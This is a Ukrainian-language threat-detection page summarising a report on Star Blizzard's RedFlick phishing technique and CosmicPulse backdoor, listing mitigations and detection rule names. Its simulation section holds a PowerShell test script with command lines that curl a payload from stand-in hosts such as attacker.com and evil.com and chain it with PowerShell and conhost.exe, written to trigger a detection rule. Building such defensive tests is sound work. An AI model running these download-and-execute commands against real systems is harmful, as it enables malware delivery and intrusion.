Зірковий Blizzard використовує RedFlick для посилення фішингу та розгортання зловмисного програмного забезпечення
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Російський державний актор Star Blizzard еволюціонував свої методи, використовуючи техніку RedFlick для доставки бекдору CosmicPulse. Актор перемістився від високоцільових фішингових атак до масштабніших автоматизованих фішингових кампаній з використанням компрометованих вебсайтів. Ці кампанії використовують витончені методи доставки, включаючи файли VHDX та корисні навантаження, приховані в PDF-файлах, щоб уникнути виявлення.
Розслідування
Аналітики Microsoft Threat Intelligence проаналізували різні фішингові хвилі, що спостерігалися протягом 2026 року, ідентифікувавши перехід від ланцюгів ClickFix до завдань RedFlick. Розслідування детально розглянуло багатоступеневий процес виконання, включаючи файли LNK, локальне виконання команд SSH та використання WebDAV для віддаленого отримання корисного навантаження. Технічний аналіз також виявив використання стеганографії та шифрування в реєстрі для корисного навантаження CosmicPulse.
Усунення
Організації повинні впроваджувати автентифікацію, стійку до фішингу, та політики умовного доступу для захисту ідентичностей. Захист кінцевих точок слід налаштувати на режим блокування EDR та увімкнути антивірусний захист у реальному часі. Крім того, реалізація правил зменшення площі атаки може запобігти виконанню зашифрованих скриптів і несанкціонованих виконуваних файлів.
Відповідь
Після виявлення команди безпеки повинні використовувати EDR для усунення шкідливих артефактів і розслідування підозрілих спроб входу. Автоматичні режими розслідування і усунення повинні бути включені для зменшення часу реакції. Організації також повинні використовувати передові антифішингові рішення та Zero-hour auto purge для нейтралізації вхідних шкідливих комунікацій.
Потік атак
Ми все ще оновлюємо цю частину.
Виявлення
Підозрілий командний рядок містить UNC-шлях з виконуваним файлом як аргументом (через cmdline)
Можливе виявлення мережевих папок (через cmdline)
Підозрілі спроби прихованої установки MsiExec Remote Installer (через cmdline)
LOLBAS Conhost (через cmdline)
Можливе використання інструмента тунелювання [Windows] (через cmdline)
Підозріле використання CURL (через cmdline)
Підозріле управління і контроль через запит DNS незвичного домену верхнього рівня (TLD) (через dns)
IOC (HashSha256) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick
IOC (SourceIP) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick
IOC (DestinationIP) для виявлення: Star Blizzard вдосконалює фішинг і доставку шкідливого ПЗ за допомогою техніки RedFlick
Виявлення виконання PowerShell з PDF [Windows PowerShell]
Виявлення техніки Star Blizzard RedFlick – Заплановані завдання та виконання командного рядка [Windows Process Creation]
Виконання симуляції
-
Історія атаки та команди: Супротивник доставляє фішингове електронне повідомлення з посиланням на шкідливий файл. При взаємодії запускається послідовність, де
curlвикористовується для отримання другого етапу. Для того щоб змішатись із системними процесами, команда створена, щоб чітко включати терміниPowerShell,PDF(згадуючи джерело запуску), таconhost.exeу рядкові команд для відповідності логіці цільового правила виявлення. Метою є виконання декодованого корисного навантаження, вбудованого в структуру PDF. -
Скрипт регресійного тестування:
# Скрипт симуляції для запуску правила "Виявлення виконання PowerShell з PDF для звантажень". # Цей скрипт створює командний рядок, що включає всі чотири необхідні ключові слова. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Витягнення з PDF...'; Start-Process conhost.exe}" # Ми виконуємо через cmd, щоб забезпечити, що conhost.exe є частиною дерева процесів/контексту команд Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Витягнення з PDF... за допомогою conhost.exe`"" -
Команди очищення:
# Видалення файлів, створених під час симуляції Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue